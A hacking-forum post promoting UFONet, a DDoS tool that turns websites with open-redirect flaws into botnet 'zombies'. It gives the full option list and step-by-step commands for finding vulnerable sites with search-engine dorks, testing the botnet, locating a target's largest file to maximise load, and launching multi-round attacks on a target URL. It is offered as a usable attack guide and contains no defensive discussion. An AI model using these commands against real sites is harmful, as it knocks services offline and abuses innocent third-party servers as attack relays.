UFONet
(http://i.imgur.com/WPmVhYE.png)
You can read this post on spanish language: UFONet - Spanish (https://underc0de.org/foro/hacking/ufonet-ddos-botnet-via-web-abuse/)
Maybe a lot of people know about this tool, but i don´t found nothing about it on the forum, and it is the reason of this post.
Briefly,
UFONet is a DDoS tool, that exploit the
Open Redirect vulnerability on third party web applications like botnet.
The Open Redirect vulnerability allows the attacker to perform redirection to the target that he choose, because that redirection is on a variable that the user can control.
I think that this tool is curious and easy to use, it found a useful and creative way to exploit Open Redirect vulnerability.
--Help:
Options: --version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose active verbose on requests
--update check for latest stable version
--check-tor check to see if Tor is used properly
--force-yes set 'YES' to all questions
--disableisup disable external check of target's status
--gui run GUI (UFONet Web Interface)
*Configure Request(s)*: --proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118')
--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default SPOOFED)
--host=HOST Use another HTTP Host header (default NONE)
--xforw Set your HTTP X-Forwarded-For with random IP values
--xclient Set your HTTP X-Client-IP with random IP values
--timeout=TIMEOUT Select your timeout (default 10)
--retries=RETRIES Retries when the connection timeouts (default 1)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--delay=DELAY Delay in seconds between each HTTP request (default 0)
*Search for 'Zombies'*: -s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=')
--sd=DORKS Search from a list of 'dorks' (ex: --sd 'dorks.txt')
--sn=NUM_RESULTS Set max number of results for engine (default 10)
--se=ENGINE Search engine to use for 'dorking' (default: duck)
--sa Search massively using all search engines
*Test Botnet*: -t TEST Update 'zombies' status (ex: -t 'zombies.txt')
--attack-me Order 'zombies' to attack you (NAT required!)
*Community*: --download-zombies Download 'zombies' from Community server: Turina
--upload-zombies Upload your 'zombies' to Community server: Turina
--blackhole Create a 'blackhole' to share your 'zombies'
--up-to=UPIP Upload your 'zombies' to a 'blackhole'
--down-from=DIP Download your 'zombies' from a 'blackhole'
*Research Target*: -i INSPECT Search for biggest file (ex: -i 'http://target.com')
*Configure Attack(s)*: --disable-aliens Disable 'aliens' web abuse of test services
--disable-isup Disable check status 'is target up?'
-r ROUNDS Set number of rounds (default: 1)
-b PLACE Set place to attack (ex: -b '/path/big.jpg')
-a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com')
Attack method:#Searching for 'zombies':For perform DDoS attack using UFONet, first of all we must collect websites that are vulnerable to Open Redirect (zombies). For it, we must use specific
Dorks. The tool include a wordlist called dorks.txt where we can find some useful parameters such as "proxy.php? Url =" or "validator? Uri =".
-Search by parameter:
./ufonet -s 'proxy.php?url='
-Search by dorks list:
./ufonet -s 'proxy.php?url='
-Select search engine between google, duck, yahoo, yandex y bing:
./ufonet -s 'proxy.php?url=' --se 'bing'
-Select all search engine:
./ufonet -s 'proxy.php?url=' --sa
-Control how many 'zombies' recieve from search engines you can use:
./ufonet --sd 'dorks.txt' --sa --sn 20
-At the end of the process, you will be asked if you want to check the list retrieved to see
if the urls are vulnerable:
Wanna check if they are valid zombies? (Y/n)
- Also, you will be asked to update the list adding automatically only 'vulnerable' web apps:
Wanna update your list (Y/n)
#Testing botnet:-Launch test:
./ufonet -t zombies.txt
-Order to 'zombies' to attack you:
./ufonet --attack-me
#Inspecting a target:-This feature will provides you the biggest file on target:
./ufonet -i http://target.com
- You can use this when attacking to be more effective:
./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
#Attacking a target:-Enter a target to attack with a number of rounds (1 round by default):
./ufonet -a http://target.com -r 10
These are the basic options of
UFONet, it have more advanced functions like use proxy. Is possible to use the tool with a GUI wiht the command:
./ufonet --gui
(http://i.imgur.com/4d9N5no.png)
Spanish post: UFONet - Spanish (https://underc0de.org/foro/reviews/ufonet-ddos-botnet-via-web-abuse-28619/msg99987/#msg99987)
Official site: http://ufonet.03c8.net/ (http://ufonet.03c8.net/)
Regards, hati ;D